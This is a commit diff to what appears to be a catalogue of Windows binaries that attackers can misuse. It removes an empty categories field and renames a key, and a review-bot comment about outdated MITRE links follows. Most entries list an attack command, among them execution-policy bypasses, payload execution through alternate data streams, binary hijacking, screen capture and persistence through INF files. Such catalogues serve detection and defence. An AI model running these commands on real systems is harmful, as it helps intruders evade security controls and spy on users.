	Remove/fix unnecessary Categories field
		| @@ -3,7 +3,6 @@ Name: Explorer.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: explorer.exe calc.exe | ||||
|     Description: 'Executes calc.exe as a subprocess of explorer.exe.' | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Netsh.exe | ||||
| Description: Execute, Surveillance | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: | | ||||
|           netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!(<IPofRemoteFileShare>) | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Nltest.exe | ||||
| Description: Credentials | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: nltest.exe /SERVER:192.168.1.10 /QUERY | ||||
|     Description: '' | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Openwith.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: OpenWith.exe /c C:\test.hta | ||||
|     Description: Opens the target file with the default application. | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Powershell.exe | ||||
| Description: Execute, Read ADS | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: powershell -ep bypass - < c:\temp:ttt | ||||
|     Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS). | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Psr.exe | ||||
| Description: Surveillance | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: psr.exe /start /gui 0 /output c:\users\user\out.zip | ||||
|     Description: Capture screenshots of the desktop and save them in the target .ZIP file. | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Robocopy.exe | ||||
| Description: Copy | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Robocopy.exe C:\SourceFolder C:\DestFolder | ||||
|     Description: Copy the entire contents of the SourceFolder to the DestFolder. | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: AcroRd32.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary | ||||
|     Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Gpup.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe | ||||
|     Description: Execute another command through gpup.exe (Notepad++ binary). | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Nlnotes.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } | ||||
|     Description: Run PowerShell via LotusNotes. | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Notes.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } | ||||
|     Description: Run PowerShell via LotusNotes. | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Nvudisp.exe | ||||
| Description: Execute, Copy, Add registry, Create shortcut, kill process | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Nvudisp.exe System calc.exe | ||||
|     Description: Execute calc.exe as a subprocess. | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Nvuhda6.exe | ||||
| Description: Execute, Copy, Add registry, Create shortcut, kill process | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: nvuhda6.exe System calc.exe | ||||
|     Description: Execute calc.exe as a subprocess. | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: ROCCAT_Swarm.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe | ||||
|     Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Setup.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Run Setup.exe | ||||
|     Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload. | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: Usbinst.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf" | ||||
|     Description: Execute calc.exe through DefaultInstall Section Directive in INF file. | ||||
|   | ||||
| @@ -3,7 +3,6 @@ Name: VBoxDrvInst.exe | ||||
| Description: Persistence | ||||
| Author: '' | ||||
| Created: 2018-05-25 | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf | ||||
|     Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe | ||||
|   | ||||
| @@ -6,14 +6,14 @@ Created: 2018-05-25 | ||||
| Commands: | ||||
|   - Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out | ||||
|     Description: Test Jscript included in Python tool to perform XSL transform (for payload execution). | ||||
|     Categories: Execution | ||||
|     Category: Execution | ||||
|     Privileges: User | ||||
|     MitreID: T1064 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1064 | ||||
|     OperatingSystem: Windows | ||||
|   - Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out | ||||
|     Description: Test Jscript included in Python tool to perform XSL transform (for payload execution). | ||||
|     Categories: Execution | ||||
|     Category: Execution | ||||
|     Privileges: User | ||||
|     MitreID: T1064 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1064 | ||||
|   | ||||
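Review bot: Both entries in this hunk still carry `MitreLink: https://attack.mitre.org/wiki/Technique/T1064`, which is the legacy wiki path; while the keys are being normalised here, the link should move to the current form, `MitreLink: https://attack.mitre.org/techniques/T1064/`. T1064 (Scripting) has also been deprecated in later ATT&CK releases, so anyone mapping these cscript/wscript entries to detections should confirm the technique ID against the current matrix rather than take it from this file. The second entry continues past the end of the hunk, so its remaining fields are not visible here.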